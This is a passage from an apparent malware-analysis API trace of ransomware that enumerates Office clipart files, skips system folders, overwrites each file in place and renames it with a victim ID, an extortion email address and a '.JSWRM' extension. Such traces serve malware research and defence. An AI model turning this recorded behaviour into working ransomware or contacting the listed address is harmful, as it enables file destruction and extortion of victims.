lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb88785, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb88785, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb88785, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11b6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0195254.WMF", cAlternateFileName="")) returned 1 [0087.149] lstrcmpiW (lpString1="J0195254.WMF", lpString2=".") returned 1 [0087.149] lstrcmpiW (lpString1="J0195254.WMF", lpString2="..") returned 1 [0087.149] lstrcmpiW (lpString1="J0195254.WMF", lpString2="...") returned 1 [0087.149] lstrcmpiW (lpString1="J0195254.WMF", lpString2="windows") returned -1 [0087.149] lstrcmpiW (lpString1="J0195254.WMF", lpString2="recovery") returned -1 [0087.149] lstrcmpiW (lpString1="J0195254.WMF", lpString2="perflogs") returned -1 [0087.149] lstrcmpiW (lpString1="J0195254.WMF", lpString2="documents and settings") returned 1 [0087.149] lstrcmpiW (lpString1="J0195254.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.149] lstrcmpiW (lpString1="J0195254.WMF", lpString2="system volume information") returned -1 [0087.149] lstrcmpiW (lpString1="J0195254.WMF", lpString2="msocache") returned -1 [0087.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0087.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195254.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195254.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0195254.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0087.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0087.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195254.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195254.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0195254.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0087.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0087.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0087.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0087.149] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195254.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195254.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.150] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4534) returned 1 [0087.150] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11b0) returned 0x205850 [0087.150] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x11b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x11b0, lpOverlapped=0x0) returned 1 [0087.152] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.152] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x11b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x11b0, lpOverlapped=0x0) returned 1 [0087.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0087.152] CloseHandle (hObject=0x314) returned 1 [0087.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0087.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0087.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0087.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0087.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0087.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0087.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.153] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195254.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195254.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195254.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195254.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0087.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0087.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0087.153] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb62536, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb62536, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb88785, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x207a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0195260.WMF", cAlternateFileName="")) returned 1 [0087.153] lstrcmpiW (lpString1="J0195260.WMF", lpString2=".") returned 1 [0087.153] lstrcmpiW (lpString1="J0195260.WMF", lpString2="..") returned 1 [0087.153] lstrcmpiW (lpString1="J0195260.WMF", lpString2="...") returned 1 [0087.153] lstrcmpiW (lpString1="J0195260.WMF", lpString2="windows") returned -1 [0087.153] lstrcmpiW (lpString1="J0195260.WMF", lpString2="recovery") returned -1 [0087.153] lstrcmpiW (lpString1="J0195260.WMF", lpString2="perflogs") returned -1 [0087.154] lstrcmpiW (lpString1="J0195260.WMF", lpString2="documents and settings") returned 1 [0087.154] lstrcmpiW (lpString1="J0195260.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.154] lstrcmpiW (lpString1="J0195260.WMF", lpString2="system volume information") returned -1 [0087.154] lstrcmpiW (lpString1="J0195260.WMF", lpString2="msocache") returned -1 [0087.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0087.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195260.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195260.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0195260.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0087.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0087.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195260.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195260.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0195260.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0087.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0087.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0087.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0087.154] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195260.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195260.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.155] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8314) returned 1 [0087.155] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2070) returned 0x205850 [0087.155] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2070, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2070, lpOverlapped=0x0) returned 1 [0087.157] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.157] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2070, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2070, lpOverlapped=0x0) returned 1 [0087.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0087.157] CloseHandle (hObject=0x314) returned 1 [0087.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0087.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0087.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0087.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0087.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0087.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0087.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0087.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0087.158] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195260.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195260.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195260.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195260.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0087.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0087.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0087.158] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb88785, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb88785, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb88785, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x72f8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0195320.WMF", cAlternateFileName="")) returned 1 [0087.158] lstrcmpiW (lpString1="J0195320.WMF", lpString2=".") returned 1 [0087.158] lstrcmpiW (lpString1="J0195320.WMF", lpString2="..") returned 1 [0087.158] lstrcmpiW (lpString1="J0195320.WMF", lpString2="...") returned 1 [0087.159] lstrcmpiW (lpString1="J0195320.WMF", lpString2="windows") returned -1 [0087.159] lstrcmpiW (lpString1="J0195320.WMF", lpString2="recovery") returned -1 [0087.159] lstrcmpiW (lpString1="J0195320.WMF", lpString2="perflogs") returned -1 [0087.159] lstrcmpiW (lpString1="J0195320.WMF", lpString2="documents and settings") returned 1 [0087.159] lstrcmpiW (lpString1="J0195320.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.159] lstrcmpiW (lpString1="J0195320.WMF", lpString2="system volume information") returned -1 [0087.159] lstrcmpiW (lpString1="J0195320.WMF", lpString2="msocache") returned -1 [0087.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0087.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195320.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195320.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0195320.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0087.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0087.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195320.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195320.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0195320.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0087.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0087.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0087.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0087.159] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195320.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195320.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.159] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=29432) returned 1 [0087.160] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x72f0) returned 0x24d210 [0087.160] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x72f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x72f0, lpOverlapped=0x0) returned 1 [0087.163] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.163] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x72f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x72f0, lpOverlapped=0x0) returned 1 [0087.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.164] CloseHandle (hObject=0x314) returned 1 [0087.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0087.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0087.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0087.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0087.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0087.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0087.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.165] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195320.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195320.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195320.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195320.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0087.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0087.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0087.165] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb62536, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb62536, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb62536, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5350, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0195342.WMF", cAlternateFileName="")) returned 1 [0087.165] lstrcmpiW (lpString1="J0195342.WMF", lpString2=".") returned 1 [0087.165] lstrcmpiW (lpString1="J0195342.WMF", lpString2="..") returned 1 [0087.166] lstrcmpiW (lpString1="J0195342.WMF", lpString2="...") returned 1 [0087.166] lstrcmpiW (lpString1="J0195342.WMF", lpString2="windows") returned -1 [0087.166] lstrcmpiW (lpString1="J0195342.WMF", lpString2="recovery") returned -1 [0087.166] lstrcmpiW (lpString1="J0195342.WMF", lpString2="perflogs") returned -1 [0087.166] lstrcmpiW (lpString1="J0195342.WMF", lpString2="documents and settings") returned 1 [0087.166] lstrcmpiW (lpString1="J0195342.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.166] lstrcmpiW (lpString1="J0195342.WMF", lpString2="system volume information") returned -1 [0087.166] lstrcmpiW (lpString1="J0195342.WMF", lpString2="msocache") returned -1 [0087.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0087.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195342.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195342.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0195342.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0087.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0087.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195342.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 